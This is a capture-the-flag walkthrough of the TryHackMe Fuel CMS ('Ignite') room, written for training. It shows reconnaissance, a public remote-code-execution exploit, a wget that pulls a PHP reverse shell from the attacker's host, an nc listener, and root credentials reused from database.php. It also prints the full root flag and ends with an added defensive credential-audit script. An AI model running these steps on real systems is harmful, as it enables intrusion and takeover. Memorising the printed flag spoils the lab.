TryHackMe: Ignite Walkthrough

Category: CTF

Posted at: Jan 28, 2024

We will go through the step-by-step process of solving the TryHackMe room titled "Fuel CMS."


Let's dive right in!

Initial Reconnaissance:

Nmap scan report for 10.10.42.50
PORT  STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.18 ((Ubuntu))

The Nmap scan revealed that port 80 is open, running an Apache web server on an Ubuntu machine.

Robots.txt

User-agent: *
Disallow: /fuel/


When I visited it, I was redirected to a login page. Using the identified CMS information, I searched for exploits related to Fuel CMS:

$ searchsploit Fuel
Fuel CMS 1.4.1 - Remote Code Execution (3) php/webapps/50477.py
$ searchsploit -m 50477
$ python3 50477.py -u http://10.10.42.50/
[+]Connecting...
Enter Command $pwd
system/var/www/html


I tried different commands in different languages to get a reverse shell, but I had no success, so I downloaded a PHP reverse shell from my local machine and accessed it via the browser:

wget 10.8.5.105/rev.php

$ nc -lnvp 8888           
listening on [any] 8888 ...
connect to [10.8.105.5] from (UNKNOWN) [10.10.42.50] 37380
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 12:52:32 up 17 min, 0 users, load average: 1.05, 0.86, 0.56
USER    TTY     FROM            LOGIN@  IDLE  JCPU  PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

User Flag:

www-data@ubuntu:/home/www-data$ cat flag.txt
6470****************************


Root Flag:

While exploring further, I found credentials in the database.php file:

'username' => 'root',
'password' => 'mememe',


Armed with the root user credentials, I successfully logged in as the root user and located the root flag:

root@ubuntu:~# cat root.txt
b9bbcb33e11b80be759c4e844862482d
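
A defensive check for the database.php finding above, as an added example that is not part of the original walkthrough: it parses a CodeIgniter-style config and flags the conditions that let a database password double as the root login. The sample config (apart from the two quoted lines), the function names and the thresholds are assumptions.

```python
import re

# Matches CodeIgniter-style entries such as:  'password' => 'mememe',
ENTRY = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")

# Constructed sample; only the username/password lines come from the walkthrough.
SAMPLE_CONFIG = """
$db['default'] = array(
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
);
"""

def parse_settings(php_text):
    """Return key/value pairs from uncommented 'key' => 'value' lines."""
    settings = {}
    for line in php_text.splitlines():
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue  # ignore commented-out settings
        m = ENTRY.search(stripped)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings

def audit(settings, system_accounts=("root",), min_length=12):
    """List findings for hardcoded database credentials (thresholds are assumptions)."""
    findings = []
    user = settings.get("username", "")
    password = settings.get("password", "")
    if user in system_accounts:
        findings.append(f"app connects to the database as '{user}'; use a least-privilege account")
    if not password:
        findings.append("empty database password")
        return findings
    if len(password) < min_length:
        findings.append(f"password is only {len(password)} characters")
    classes = sum(bool(re.search(p, password)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^\w]"))
    if classes < 3:
        findings.append(f"password uses {classes} character class(es)")
    findings.append("plaintext password in a web-readable file; never reuse it for an OS account")
    return findings

if __name__ == "__main__":
    for finding in audit(parse_settings(SAMPLE_CONFIG)):
        print("[!]", finding)
```

Run it against the real application/config/database.php contents in place of SAMPLE_CONFIG; any finding means a web-server compromise can expose a credential worth rotating.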